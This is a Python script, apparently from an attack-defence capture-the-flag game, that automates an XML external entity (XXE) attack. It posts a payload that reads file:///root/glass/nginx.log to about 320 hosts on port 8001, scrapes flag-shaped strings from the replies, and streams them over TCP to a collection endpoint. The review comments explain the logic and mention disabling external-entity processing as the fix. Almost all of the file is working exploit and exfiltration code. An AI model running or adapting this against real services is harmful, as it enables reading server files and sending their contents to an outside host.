
import requests
from multiprocessing.dummy import Pool, Process
import socket
import re
import time
# Port of the HTTP service, and the record name used by both requests in get().
PORT = '8001'
NAME = 'erfm-37c7-b7j8'
#NAME = '22'

# Matches found by the workers, waiting for posting() to forward them.
LIST = []

# (host, port) of the TCP endpoint that posting() connects to.
address = ('10.10.10.2', 31337)

# 31 upper-case letters or digits followed by '='.
pattern = '[A-Z0-9]{31}='
rgx = re.compile(pattern)

# XML document sent as the `text` form field. Its DOCTYPE declares an external
# entity `z` with a file: SYSTEM identifier and references it inside <data>;
# a parser that resolves external entities would inline that file's content
# there. A service closes this off by disabling DTD / external-entity
# processing in whichever XML parser handles the submitted document.
post = '''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE picture [<!ENTITY z SYSTEM "file:///root/glass/nginx.log">]>
<picture>
<name>9916-3235-9674</name>
<description>Picture description</description>
<data>&z;</data>
</picture>'''

# One address per third-octet value from 1 to 321, leaving out 27.
urls = [
    '10.60.{0}.8'.format(octet)
    for octet in range(1, 322)
    if octet != 27
]
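def posting():
    """Forward queued matches to the submission endpoint in batches.

    Runs forever. Every five seconds the strings queued in the module-level
    ``LIST`` are joined with newlines, sent to ``address`` over a fresh TCP
    connection, and the first reply (up to 1024 bytes) is printed.

    Entries are removed from ``LIST`` only once they have been sent, so a
    connection failure leaves them queued for the next cycle instead of
    ending the loop or dropping them.
    """
    while True:
        # Work on a snapshot and trim the shared list in place afterwards:
        # anything a worker appends in the meantime sits behind the snapshot
        # and survives, which rebinding LIST to a new list did not guarantee.
        batch = LIST[:]
        if batch:
            payload = ('\n'.join(batch) + '\n').encode('ascii')
            try:
                # The context manager closes the socket on every path.
                with socket.socket() as ms:
                    ms.connect(address)
                    # send() may transmit only part of the buffer.
                    ms.sendall(payload)
                    del LIST[:len(batch)]
                    print(ms.recv(1024))
            except OSError as err:
                print('submit failed: {0}'.format(err))
        time.sleep(5)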
def get(url):
    """Send the XML document to one host and queue any matches in the reply.

    ``url`` is a bare host address; the function prefixes ``http://`` and
    appends ``PORT``. It posts ``NAME`` and ``post`` as form fields, then
    requests ``/get?name=<NAME>`` on the same session and inspects that
    response body.

    Returns ``None`` if either request raises, otherwise ``''``. Matches of
    ``rgx`` are appended to the module-level ``LIST`` as one newline-joined
    string.

    NOTE(review): the listing lost its indentation. The ``else`` below is
    attached to the length check here; it could equally belong to
    ``if flags`` -- confirm against the original file.
    """
    url = 'http://' + url + ':' + PORT
    sess = requests.session()
    data = { 'name': NAME,
             'text': post }
    try:
        # The POST response is not inspected; only the follow-up GET is read.
        response_post = sess.post(url, data=data)
        response_get = sess.get(url + '/get?name=' + NAME)
    except Exception:
        # Any failure on either request ends the attempt for this host.
        return
    ret = response_get.text
    # Bodies longer than 300 characters are dumped and searched for matches;
    # presumably that length indicates the entity was expanded -- confirm.
    if len(ret) > 300:
        print(url)
        print(response_get.text)
        print('-'*80)
        flags = rgx.findall(ret)
        if flags:
            s = '\n'.join(flags)
            LIST.append(s)
    else:
        print(url + ' LOCKED')
    return ''
# multiprocessing.dummy exposes the multiprocessing API on top of threads, so
# the workers and the sender below share this module's LIST.
pool = Pool()
# Start the submitter before the sweep so results are forwarded while the
# workers are still running.
sender = Process(target=posting)
sender.start()
# One get() call per entry in urls; map() blocks until every call has returned.
lst = pool.map(get, urls)
pool.close()
pool.join()
# NOTE(review): posting() loops forever and the sender is not marked as a
# daemon, so the interpreter probably stays alive after exit() until it is
# interrupted -- confirm.
exit()